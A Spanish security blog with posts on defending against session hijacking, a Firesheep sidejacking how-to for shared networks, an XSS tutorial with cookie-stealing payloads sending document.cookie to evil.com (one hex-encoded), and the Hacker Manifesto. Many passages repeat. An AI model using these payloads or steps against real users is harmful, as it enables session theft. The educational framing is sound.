lunes, 30 de enero de 2012
Nuevo Blog
Se que he dejado un poco abandonado este blog, (más que nada por falta de tiempo); quiero decirles que no voy a dejarlo, únicamente que hace poco recibí la invitación de participar en +bits blog de tecnología dirigido por mi amigo Asaf Lopez (Saporules), en el área de +security; a pesar de tener otro blog acerca de seguridad informática, seguire escribiendo aquí, tal vez con menos frecuencia que en +security; principalmente porque el enfoque es distinto, mientras aquí hablo de tutoriales, tips para asegurar su información o herramientas de hacking, en +security hablare de noticias y opiniones del mundo de la seguridad informática, (por supuesto esto no evitara que incluya posts del otro blog en este o viceversa).
martes, 6 de diciembre de 2011
Como protejerse ante ataques de Session Hijacking (ACTUALIZADO)
(ACTUALIZACIÓN 06/12/11)
Como estos sitios cambian constantemente, la info estaba un poco obsoleta :P, pero ya esta listo y actualizado con las nuevas versiones :).
Hasta ahora conocemos distintos métodos de como robar cookies por los siguientes posts:
- Cookies
- XSS
- Sidejacking
Todos estos tipos de ataques se les conoce como Session Hijacking, y consisten principalmente en robar las cookies de la víctima
Ahora bien, ¿Cómo podemos protegernos ante este tipo de ataques?
Usando HTTPS
En las redes existen distintos tipos de protocolos, definamos que un protocolo es un lenguaje (como el español), sólo la aplicación adecuada conoce este lenguaje, y en el caso de HTTP (que significa Hypertext Transfer Protocol), sólo el navegador (safari, explorer, firefox...), sabe interpretar este lenguaje; que además es el más usado por las páginas que visitas normalmente, ahora bien, este lenguaje es vulnerable, ya que todo lo que se envía y recibe es a través de texto plano, es decir, que si una persona llega a capturar un paquete, este es legible por esta persona, sin necesidad de desencriptarlo.
Por eso se creo una versión alterna de HTTP, llamada HTTPS, cuya única diferencia es que toda la información que viaja, se encuentra de manera encriptada, y por lo tanto no puede ser leído por nadie más que el navegador y el servidor (sin embargo no hay que confiar 100% en esto).
Instrucciones para "obligar" el uso de HTTPS en distintas páginas:
Facebook
Flecha de la esquina superior derecha (a lado de el botón de "Inicio") --> Configuración de la cuenta --> "Seguridad" en el panel del lado izquierdo --> Navegación segura
Eliminando cookies
Si eres paranóico, y guardas las cookies de tus sesiones en una computadora compartida, o tienes miedo de que alguien más la pueda usar, puedes usar extensiones para que tus cookies se borren cada vez que cierras el navegador y sólo funcionen durante la sesión.
Algunos de estos son, por ejemplo:
- Chrome --> Forget me
- Firefox --> Cookie Killer / NoScript
- IExplorer --> Cookie Monster II
Revisando logs de la sesión
Algunos sitios permiten verificar desde donde fue la última vez que abriste la sesión y en donde, incluso las sesiones activas, esto es bastante útil, si sospechas que alguien más ha estado entrando a tu cuenta, o eliminar y prohibir las conexiones no deseadas
en Gmail
En la esquina inferior derecha donde dice "Última actividad de la cuenta"
si necesitan más detalles pueden hacer click en "Información detallada"
en Facebook
(se cree que esta característica se añadió debido a que la cuenta del fundador de facebook, Mark Zuckerberg fue hackeada --> link )
Flecha de la esquina superior derecha (a lado de el botón de "Inicio") --> Configuración de la cuenta --> "Seguridad" en el panel del lado izquierdo --> Sesiones activas
Hasta ahora sólo he visto esta utilidad en gmail y facebook, muchas personas insisten en que hotmail también debería tener este tipo de herramienta, pero al parecer microsoft se rehusa a agregarlos (link)
(CONSEJO: usen gmail!) .
Usando Sentido Común.
A veces sólo es necesario un poco de sentido común, que es útil en especial para los ataques de XSS, basta con reflexionar acerca de:
- la procedencia de los links de internet
- no ingresar a sitios fraudulentos o peligrosos
- Usar solo HTTPS en una red Wi-Fi abierta, (en caso de que no este habilitada la página para https, no usarla o usar una conexión VPN)
- Mantener seguros tus dispositivos (incluyendo smartphones).
- Leer recomendaciones de seguridad (como estas :) ).
En general, el sentido común es el mejor método de protección en la seguridad informática, y el único método de prevención ante ataques de Ingeniería Social.
Como estos sitios cambian constantemente, la info estaba un poco obsoleta :P, pero ya esta listo y actualizado con las nuevas versiones :).
Hasta ahora conocemos distintos métodos de como robar cookies por los siguientes posts:
- Cookies
- XSS
- Sidejacking
Todos estos tipos de ataques se les conoce como Session Hijacking, y consisten principalmente en robar las cookies de la víctima
Ahora bien, ¿Cómo podemos protegernos ante este tipo de ataques?
Usando HTTPS
En las redes existen distintos tipos de protocolos, definamos que un protocolo es un lenguaje (como el español), sólo la aplicación adecuada conoce este lenguaje, y en el caso de HTTP (que significa Hypertext Transfer Protocol), sólo el navegador (safari, explorer, firefox...), sabe interpretar este lenguaje; que además es el más usado por las páginas que visitas normalmente, ahora bien, este lenguaje es vulnerable, ya que todo lo que se envía y recibe es a través de texto plano, es decir, que si una persona llega a capturar un paquete, este es legible por esta persona, sin necesidad de desencriptarlo.
Por eso se creo una versión alterna de HTTP, llamada HTTPS, cuya única diferencia es que toda la información que viaja, se encuentra de manera encriptada, y por lo tanto no puede ser leído por nadie más que el navegador y el servidor (sin embargo no hay que confiar 100% en esto).
Instrucciones para "obligar" el uso de HTTPS en distintas páginas:
Flecha de la esquina superior derecha (a lado de el botón de "Inicio") --> Configuración de la cuenta --> "Seguridad" en el panel del lado izquierdo --> Navegación segura
Twitter
Perfil --> Editar tu Perfil --> Solo HTTPS
Gmail
Menú del Engranaje (del lado derecho) --> Configuración --> Usar siempre https
Hotmail
Es necesario acceder a la página escribiendo https://hotmail.com
(Si requieren saber como habilitarlo en otra página avísenme por un comentario, pero recuerden, que NO siempre es posible en todas las páginas)
Usando un VPN
Una VPN (Virtual Private Network) es una red privada virtual, es decir, es una red establecida en la internet donde varias computadoras están conectadas como si estuvieran en una red local, esto evita que los datos enviados mediante una VPN sean interceptados por otra persona.
Existen servicios gratuitos de VPN sin necesidad de configuración:
Este tipo de conexiones es verdaderamente útil cuando una persona se encuentra en una zona de Wi-Fi gratuito, como bibliotecas, cafés, universidades, centros comerciales, etc.
Eliminando cookies
Si eres paranóico, y guardas las cookies de tus sesiones en una computadora compartida, o tienes miedo de que alguien más la pueda usar, puedes usar extensiones para que tus cookies se borren cada vez que cierras el navegador y sólo funcionen durante la sesión.
Algunos de estos son, por ejemplo:
- Chrome --> Forget me
- Firefox --> Cookie Killer / NoScript
- IExplorer --> Cookie Monster II
Revisando logs de la sesión
Algunos sitios permiten verificar desde donde fue la última vez que abriste la sesión y en donde, incluso las sesiones activas, esto es bastante útil, si sospechas que alguien más ha estado entrando a tu cuenta, o eliminar y prohibir las conexiones no deseadas
en Gmail
En la esquina inferior derecha donde dice "Última actividad de la cuenta"
si necesitan más detalles pueden hacer click en "Información detallada"
en Facebook
(se cree que esta característica se añadió debido a que la cuenta del fundador de facebook, Mark Zuckerberg fue hackeada --> link )
Flecha de la esquina superior derecha (a lado de el botón de "Inicio") --> Configuración de la cuenta --> "Seguridad" en el panel del lado izquierdo --> Sesiones activas
Hasta ahora sólo he visto esta utilidad en gmail y facebook, muchas personas insisten en que hotmail también debería tener este tipo de herramienta, pero al parecer microsoft se rehusa a agregarlos (link)
(CONSEJO: usen gmail!) .
Usando Sentido Común.
A veces sólo es necesario un poco de sentido común, que es útil en especial para los ataques de XSS, basta con reflexionar acerca de:
- la procedencia de los links de internet
- no ingresar a sitios fraudulentos o peligrosos
- Usar solo HTTPS en una red Wi-Fi abierta, (en caso de que no este habilitada la página para https, no usarla o usar una conexión VPN)
- Mantener seguros tus dispositivos (incluyendo smartphones).
- Leer recomendaciones de seguridad (como estas :) ).
jueves, 5 de mayo de 2011
Presentación Anti-Hacking
Bueno, como lo prometido es deuda aquí les dejo la presentación que dí en el Tecnológico de Monterrey, más adelante subiere las demostraciones de los ataques aquí mismo. Y es probable que de la misma conferencia otra vez :).
md5: 4e30d36e9e12654a0ad0e7bf52027f6c
sha: c5d148d3c279e55220832a18bc5fe59e6c20f391
(link)
md5: 4e30d36e9e12654a0ad0e7bf52027f6c
sha: c5d148d3c279e55220832a18bc5fe59e6c20f391
(link)
lunes, 25 de abril de 2011
De regreso...
Hace varias semanas que no logro tener el tiempo de escribir en este blog, así que ahora ando enviando señales de vida. Casi no he tenido tiempo de escribir debido a que he estado ocupado en proyectos escolares y personales; entre los personales se encuentra un troyano que creé como prueba de concepto para el iphone u otros dispositivos con iOS; de éste, pueden checar mis avances en la siguiente página (link) (Sus comentarios siempre son bienvenidos...).
Además he estado preparando una conferencia que daré en mi escuela acerca de los principios básicos de la seguridad informática, la cuál subiré aquí mismo después de darla, con demostraciones en videos, espero que les agraden, sólo necesito un poco de tiempo para acabar bien el semestre.
Debido a mi ausencia decidí compartirles el siguiente documento:
Se le conoce como el "Hacker Manifiesto" o "Consciousness of hacker", fue escrito por The Mentor en 1986, no se que opinen ustedes, pero a mi me parece inspirador, en especial después de relacionarlo con los persistentes ataques hacia Geohot por parte de Sony (link).
(link)
Versión traducida por LexLuthor
Lo siguiente, fue escrito poco después de mi arresto....
\/\La Conciencia de un Hacker/\/
by
+++The Mentor+++
Escrito en Enero 08 de 1986.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Uno más ha sido capturado hoy,
Está en todos los periódicos.
"Adolescente arrestado por delito informático"
"Hacker arrestado por irrumpir en un sistema bancario".
//-Malditos muchachos. Son todos iguales.//
¿Pero pueden, con su psicología barata y su cerebro de los años cincuenta, siquiera echar un vistazo a lo que hay detrás de los ojos de un hacker? ¿Se han parado alguna vez a pensar qué es lo que le hace comportarse así, qué le ha convertido en lo que es?
Soy un Hacker, entra a mi mundo . . .
El mío es un mundo que comienza en la escuela . . .
Soy más inteligente que la mayoría de los otros muchachos, esa basura que ellos nos enseñan me aburre . . .
//-Malditos subrealizados. Son todos iguales.//
Estoy en la preparatoria.
He escuchado a los profesores explicar por decimoquinta vez como reducir una fracción.
Yo lo entiendo.
"-No, Srta. Smith, no le voy a mostrar mi trabajo, lo hice en mi mente . . ."
//-Maldito muchacho. Probablemente se lo copió. Todos son iguales.//
Hoy hice un descubrimiento.
Encontré una computadora.
Espera un momento, esto es lo máximo. Esto hace lo que yo le pida. Si comete un error es porque yo me equivoqué.
No porque no le gusto . . .
O se siente amenazada por mi . . .
O piensa que soy un engreído . . .
O no le gusta enseñar y no debería estar aquí . . .
//-Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.//
Y entonces ocurrió . . .
una puerta abierta al mundo . . .
Corriendo a través de las líneas telefónicas
como la heroína a través de las venas de un adicto, un pulso electrónico es enviado,
un refugio para las incompetencias del día a día es buscado . . .
una tabla de salvación es encontrada.
"Este es . . . este es el lugar a donde pertenezco . . ."
Los conozco a todos aquí . . .
aunque nunca los hubiera visto, o hablado con ellos, o nunca vuelva a escuchar de ellos otra vez . . Los conozco a todos . . .
//-Malditos muchachos. Enlazando las líneas telefónicas otra vez. Todos son iguales . . .//
Apuesta lo que quieras a que todos somos iguales . . .
Nos han estado dando comida para bebés con cuchara en la escuela, cuando estábamos hambrientos de carne . . .
Las migajas de carne que ustedes dejaron escapar estaban masticadas y sin sabor.
Hemos sido dominados por los sádicos, o ignorados por los apáticos.
Los pocos que tenían algo que enseñarnos encontraron en nosotros alumnos atentos, pero esos pocos son como gotas de agua en el desierto.
Este es nuestro mundo ahora . . .
El mundo del electrón y el switch, la belleza del baudio.
Hacemos uso de un servicio que ya existe sin pagar, por que podría ser ridículamente barato, si no estuviera en manos de glotones hambrientos de ganancias, y ustedes nos llaman criminales.
Nosotros exploramos . . .
y ustedes nos llaman criminales.
Nosotros buscamos detrás del conocimiento . . .
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios religiosos . . .
y ustedes nos llaman criminales.
Ustedes construyen bombas atómicas,
ustedes hacen la guerra,
asesinan, engañan y nos mienten
y tratan de hacernos creer que es por nuestro bien,
ahora nosotros somos los criminales.
Si, soy un criminal.
Mi crimen es la curiosidad.
Mi crimen es el juzgar a las personas por lo que dicen y piensan, no por como se ven.
Mi crimen es ser mucho más inteligente que ustedes, algo por lo cual jamás podrán perdonarme.
Soy un Hacker, y este es mi manifiesto.
Pueden detener a este individuo, pero no podrán detenernos a todos… después de todo, todos somos iguales.
(link)
Además he estado preparando una conferencia que daré en mi escuela acerca de los principios básicos de la seguridad informática, la cuál subiré aquí mismo después de darla, con demostraciones en videos, espero que les agraden, sólo necesito un poco de tiempo para acabar bien el semestre.
Debido a mi ausencia decidí compartirles el siguiente documento:
Se le conoce como el "Hacker Manifiesto" o "Consciousness of hacker", fue escrito por The Mentor en 1986, no se que opinen ustedes, pero a mi me parece inspirador, en especial después de relacionarlo con los persistentes ataques hacia Geohot por parte de Sony (link).
Los dejo con esto, y espero estar libre en unas 2 semanas :)
The Hacker Manifesto
by
+++The Mentor+++
Written January 8, 1986
+++The Mentor+++
Written January 8, 1986
Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.
I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.
And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...
You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.
This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.
I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.
And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...
You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.
This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
(link)
Versión traducida por LexLuthor
Lo siguiente, fue escrito poco después de mi arresto....
\/\La Conciencia de un Hacker/\/
by
+++The Mentor+++
Escrito en Enero 08 de 1986.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Uno más ha sido capturado hoy,
Está en todos los periódicos.
"Adolescente arrestado por delito informático"
"Hacker arrestado por irrumpir en un sistema bancario".
//-Malditos muchachos. Son todos iguales.//
¿Pero pueden, con su psicología barata y su cerebro de los años cincuenta, siquiera echar un vistazo a lo que hay detrás de los ojos de un hacker? ¿Se han parado alguna vez a pensar qué es lo que le hace comportarse así, qué le ha convertido en lo que es?
Soy un Hacker, entra a mi mundo . . .
El mío es un mundo que comienza en la escuela . . .
Soy más inteligente que la mayoría de los otros muchachos, esa basura que ellos nos enseñan me aburre . . .
//-Malditos subrealizados. Son todos iguales.//
Estoy en la preparatoria.
He escuchado a los profesores explicar por decimoquinta vez como reducir una fracción.
Yo lo entiendo.
"-No, Srta. Smith, no le voy a mostrar mi trabajo, lo hice en mi mente . . ."
//-Maldito muchacho. Probablemente se lo copió. Todos son iguales.//
Hoy hice un descubrimiento.
Encontré una computadora.
Espera un momento, esto es lo máximo. Esto hace lo que yo le pida. Si comete un error es porque yo me equivoqué.
No porque no le gusto . . .
O se siente amenazada por mi . . .
O piensa que soy un engreído . . .
O no le gusta enseñar y no debería estar aquí . . .
//-Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.//
Y entonces ocurrió . . .
una puerta abierta al mundo . . .
Corriendo a través de las líneas telefónicas
como la heroína a través de las venas de un adicto, un pulso electrónico es enviado,
un refugio para las incompetencias del día a día es buscado . . .
una tabla de salvación es encontrada.
"Este es . . . este es el lugar a donde pertenezco . . ."
Los conozco a todos aquí . . .
aunque nunca los hubiera visto, o hablado con ellos, o nunca vuelva a escuchar de ellos otra vez . . Los conozco a todos . . .
//-Malditos muchachos. Enlazando las líneas telefónicas otra vez. Todos son iguales . . .//
Apuesta lo que quieras a que todos somos iguales . . .
Nos han estado dando comida para bebés con cuchara en la escuela, cuando estábamos hambrientos de carne . . .
Las migajas de carne que ustedes dejaron escapar estaban masticadas y sin sabor.
Hemos sido dominados por los sádicos, o ignorados por los apáticos.
Los pocos que tenían algo que enseñarnos encontraron en nosotros alumnos atentos, pero esos pocos son como gotas de agua en el desierto.
Este es nuestro mundo ahora . . .
El mundo del electrón y el switch, la belleza del baudio.
Hacemos uso de un servicio que ya existe sin pagar, por que podría ser ridículamente barato, si no estuviera en manos de glotones hambrientos de ganancias, y ustedes nos llaman criminales.
Nosotros exploramos . . .
y ustedes nos llaman criminales.
Nosotros buscamos detrás del conocimiento . . .
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios religiosos . . .
y ustedes nos llaman criminales.
Ustedes construyen bombas atómicas,
ustedes hacen la guerra,
asesinan, engañan y nos mienten
y tratan de hacernos creer que es por nuestro bien,
ahora nosotros somos los criminales.
Si, soy un criminal.
Mi crimen es la curiosidad.
Mi crimen es el juzgar a las personas por lo que dicen y piensan, no por como se ven.
Mi crimen es ser mucho más inteligente que ustedes, algo por lo cual jamás podrán perdonarme.
Soy un Hacker, y este es mi manifiesto.
Pueden detener a este individuo, pero no podrán detenernos a todos… después de todo, todos somos iguales.
(link)
lunes, 28 de marzo de 2011
Sidejacking.
Repasemos, sabemos como robar los cookies de una computadora a la que tenemos acceso físico (link), sabemos como robarlas de una computadora que esta en otra parte del mundo (link); en esta ocasión les mostraré como es posible hacerlo desde una red local, es decir, la red de tu escuela, la red de tu casa o la de un cybercafé.
En una red alámbrica todas las computadoras se conectan a un switch, del switch se conecta al modem y del modem se conecta al router (en el caso del internet casero, como el de infinitum, estos 3 se encuentran en un mismo aparato que puede ser llamado modem o router).
La red inalámbrica es similar, la única diferencia es que en vez de un cable, el medio por el cual viaja la información es el aire.
En el caso del internet inalámbrico, ya que el medio que usamos es el aire, éste es público, y alguien más puede hacer mal uso de él. La información que viaja en el aire cuando uno esta conectado a internet se conoce como paquetes; estos paquetes tienen un origen y un destino predefinido, pero pueden ser "interceptados" por otra tarjeta de red que este de por medio.
Esto lo podemos lograr con herramientas como Hamster & Ferret o Firesheep
- Tutorial de Hamster & Ferret cortesía de Zosemu?
Hamster & Ferret
Con Hamster & Ferret lo que ocurre es que se capturan los paquetes que son enviados de la computadora al router, algunos de estos paquetes contienen cookies de las sesiones, las cuales son filtradas por el Ferret para poderlas ver en tu navegador
Para esto primero explicaré como funcionan este tipo de redes, intentando no meterme en términos tan técnicos...
En una red alámbrica todas las computadoras se conectan a un switch, del switch se conecta al modem y del modem se conecta al router (en el caso del internet casero, como el de infinitum, estos 3 se encuentran en un mismo aparato que puede ser llamado modem o router).
La red inalámbrica es similar, la única diferencia es que en vez de un cable, el medio por el cual viaja la información es el aire.
En el caso del internet inalámbrico, ya que el medio que usamos es el aire, éste es público, y alguien más puede hacer mal uso de él. La información que viaja en el aire cuando uno esta conectado a internet se conoce como paquetes; estos paquetes tienen un origen y un destino predefinido, pero pueden ser "interceptados" por otra tarjeta de red que este de por medio.
Esto lo podemos lograr con herramientas como Hamster & Ferret o Firesheep
- Tutorial de Hamster & Ferret cortesía de Zosemu?
Hamster & Ferret
Con Hamster & Ferret lo que ocurre es que se capturan los paquetes que son enviados de la computadora al router, algunos de estos paquetes contienen cookies de las sesiones, las cuales son filtradas por el Ferret para poderlas ver en tu navegador
Hamster & Ferret intenta capturar todos los paquetes que contengan cookies, por lo que como había mencionado anteriormente, no no sirven varios de ellos, y necesitamos concentrarnos específicamente en los cookies de sesión, para esto nos es más útil usar Firesheep.
Firesheep
Esta es una extensión de Firefox que recientemente cobro mucha popularidad entre los script kiddies, ya que bastaba con sólo descargarla, instalar la librería WinPcap (en windows), y sentarse, tomarse un café mientras las víctimas caen sin ningún esfuerzo
- link de descarga cortesía de Code Butler
- link de descarga de Winpcap en caso de que esten usando Windows, para que lo instalen primero
(Si tienen algún problema con la instalación pueden preguntarme cualquier cosa en los comentarios, aunque confío en que el proceso de instalación es bastante sencillo).
Firesheep
Esta es una extensión de Firefox que recientemente cobro mucha popularidad entre los script kiddies, ya que bastaba con sólo descargarla, instalar la librería WinPcap (en windows), y sentarse, tomarse un café mientras las víctimas caen sin ningún esfuerzo
- link de descarga cortesía de Code Butler
- link de descarga de Winpcap en caso de que esten usando Windows, para que lo instalen primero
(Si tienen algún problema con la instalación pueden preguntarme cualquier cosa en los comentarios, aunque confío en que el proceso de instalación es bastante sencillo).
Firesheep, sólo captura los cookies de sesión de algunos sitios, por los que es necesario especificar que cookies son los necesarios para sesión, y es posible crear un "handler" en un javascript para detectar los cookies de sesión, este suele ser un largo proceso de prueba y error, pueden usar el editor de cookies que ya había mencionado Edit Cookies.
Pueden basarse en los siguientes ejemplos realizados por mi:
Una vez que sepan cuales son los cookies de sesión incluyen el handler en:
MacOSX -- > Application Support/Firefox/Profiles/[Usuario]/extensions/firesheep@codebutler.com/handlers/
Windows --> C:\Users\[Usuario]\AppData\Roaming\Mozilla\Firefox\Profiles\pjz5jouj.default\extensions\firesheep@codebutler.com\handlers
Pueden basarse en la siguiente plantilla
RECUERDEN: NO ME HAGO RESPONSABLE POR LAS ESTUPIDECES QUE PUEDAN COMETER; ESTO LO COMPARTO CON FINES EDUCATIVOS; además que es posible descubrir que persona fue el atacante usando las herramientas de Firesheep y Hamster & Ferret.
miércoles, 16 de marzo de 2011
XSS - Ataques de Cross-Site Scripting
La semana pasada aprendimos como robar las cookies de un navegador del cual tenemos acceso físico.
En esta ocasión les mostraré como es posible hacerlo de manera remota.
Los ataques de Cross-Site Scripting o XSS son ataques por medio de código (scripts) que son "inyectados" en las páginas para diversos propósitos.
Para empezar... ¿Qué es un script?
Existen distintos lenguajes de programación como C, C++, o Java que compilan su código para convertirlo en una aplicación en "código binario" (como los programas que utilizas normalmente), pero además hay un tipo de código que se "interpreta" en el momento de que alguna aplicación lo encuentra, a este se le llama script.
En esta ocasión hablaré especialmente de los scripts usados en las páginas de internet, que normalmente están en javascript, que como mencionaba, es un código que es interpretado por tu navegador al entrar a una página, esto le sirve al navegador o browser para añadir más funciones (como aplicaciones en línea) además de la apariencia (que normalmente esta en HTML).
Para ver los scripts que contiene una página es posible ver el código fuente de esta, que en la mayoría de los navegadores se muestra realizando
click derecho --> ver código fuente de página.
Ahora bien, cuando una página te dá sus cookies, generalmente las revisa por medio de un código de javascipt que envía los datos de tu cookie al servidor.
Para comprender mejor como funciona
Intenta lo siguiente...
introduce en la barra de dirección de tu navegador estando en cualquier sitio el siguiente código:
javascript:alert(document.cookie);
javascript:alert() --> nos indica un script de tipo javascript, la función alert nos despliega un texto específicado
(ej. javascript:alert("Hola Mundo"); )
document.cookie --> nos indica las cookies almacenadas de la página.
Esto no sirve de mucho si no tenemos la computadora de forma física (y aunque la tuviéramos, tampoco nos serviría de mucho). Lo que hay que hacer es introducir o "inyectar" un script en alguna página para que esta capture los cookies y los redirija a un sitio que nos convenga.
algo así:
<script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>
esto, colocado en una página como www.facebook.com robaría todos los cookies del usuario que active este script, a veces es presionando un botón (clickjacking), al cargar una página, o incluso solamente pasando el mouse encima del link.
Como en el siguiente Ejemplo:
Ejemplo
usando
<a onMouseOver="alert(document.cookie);">Ejemplo</a>
Generalmente este código es insertado en espacios de texto, como los que existen para comentarios, o
posts en facebook o twitter. Aunque también es posible ocultarlo en un mensaje de correo, animaciones en flash, etc.
Existen 3 tipos de ataques XSS, persistentes, no persistentes y por DOM; los persistentes, son por ejemplo, mensajes maliciosos con código que se encuentran en foros, páginas de video, etc. Sólo te roban la cookie de la página en la que se encuentran y dejan de funcionar sólo cuando son borrados.
El tipo no persistente, son links que se envían por correo o por redes sociales, donde se incluye en parte del URL (la dirección del sitio) el script para que la persona piense que esta entrando a su sesión de usuario. Este tipo de ataques sólo funciona cuando la persona entra directamente haciendo click en el url y lucen algo así:
o, ya codificados en hexadecimal para ocultar el javascript.
http://portal.example/index.php?sessionid=12312312&
username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65
%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70
%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65
%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F
%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64
%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73
%63%72%69%70%74%3E
Otro grave problema es que en el caso de páginas como twitter, han nacido servicios como bit.ly que encogen la URL para que no ocupe tanto espacio, sin embargo esto da oportunidad al atacante de ocultar mucho mejor su url modificado.
Los ataques de Cross-Site Scripting hasta la fecha son la vulnerabilidad de la cual padecen más páginas hasta la fecha, en el 2007 la empresa Symantec calculó que un 80% de las páginas de internet eran vulnerables a este tipo de ataques.
Incluso existe una base de datos de sitios expuestos con estas vulnerabilidades llamada XSSED.
Para parchar este tipo de vulnerabilidades, basta con que el sitio incluya un script en su servidores que verifique los posts antes de que sean enviados.
En cuanto a usuarios normales, hay que evitar en especial los ataques no persistentes, tomando en cuenta en que tipo de páginas se entra, a donde llevan los links, o si se confía en la persona envió esa información.
Links de interés:
Tutorial básico de cookies
Tutorial básico de XSS
Más Información del XSS
Preguntas más frecuentes del XSS
UPDATE:
Me encontré un excelente tutorial cortesía de Lord Epsylon acerca de XSS, es algo largo pero viene muy bien explicado; link.
En esta ocasión les mostraré como es posible hacerlo de manera remota.
Los ataques de Cross-Site Scripting o XSS son ataques por medio de código (scripts) que son "inyectados" en las páginas para diversos propósitos.
Para empezar... ¿Qué es un script?
Existen distintos lenguajes de programación como C, C++, o Java que compilan su código para convertirlo en una aplicación en "código binario" (como los programas que utilizas normalmente), pero además hay un tipo de código que se "interpreta" en el momento de que alguna aplicación lo encuentra, a este se le llama script.
En esta ocasión hablaré especialmente de los scripts usados en las páginas de internet, que normalmente están en javascript, que como mencionaba, es un código que es interpretado por tu navegador al entrar a una página, esto le sirve al navegador o browser para añadir más funciones (como aplicaciones en línea) además de la apariencia (que normalmente esta en HTML).
Para ver los scripts que contiene una página es posible ver el código fuente de esta, que en la mayoría de los navegadores se muestra realizando
click derecho --> ver código fuente de página.
Ahora bien, cuando una página te dá sus cookies, generalmente las revisa por medio de un código de javascipt que envía los datos de tu cookie al servidor.
Para comprender mejor como funciona
Intenta lo siguiente...
introduce en la barra de dirección de tu navegador estando en cualquier sitio el siguiente código:
javascript:alert(document.cookie);
javascript:alert() --> nos indica un script de tipo javascript, la función alert nos despliega un texto específicado
(ej. javascript:alert("Hola Mundo"); )
document.cookie --> nos indica las cookies almacenadas de la página.
Esto no sirve de mucho si no tenemos la computadora de forma física (y aunque la tuviéramos, tampoco nos serviría de mucho). Lo que hay que hacer es introducir o "inyectar" un script en alguna página para que esta capture los cookies y los redirija a un sitio que nos convenga.
algo así:
<script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>
esto, colocado en una página como www.facebook.com robaría todos los cookies del usuario que active este script, a veces es presionando un botón (clickjacking), al cargar una página, o incluso solamente pasando el mouse encima del link.
Como en el siguiente Ejemplo:
Ejemplo
usando
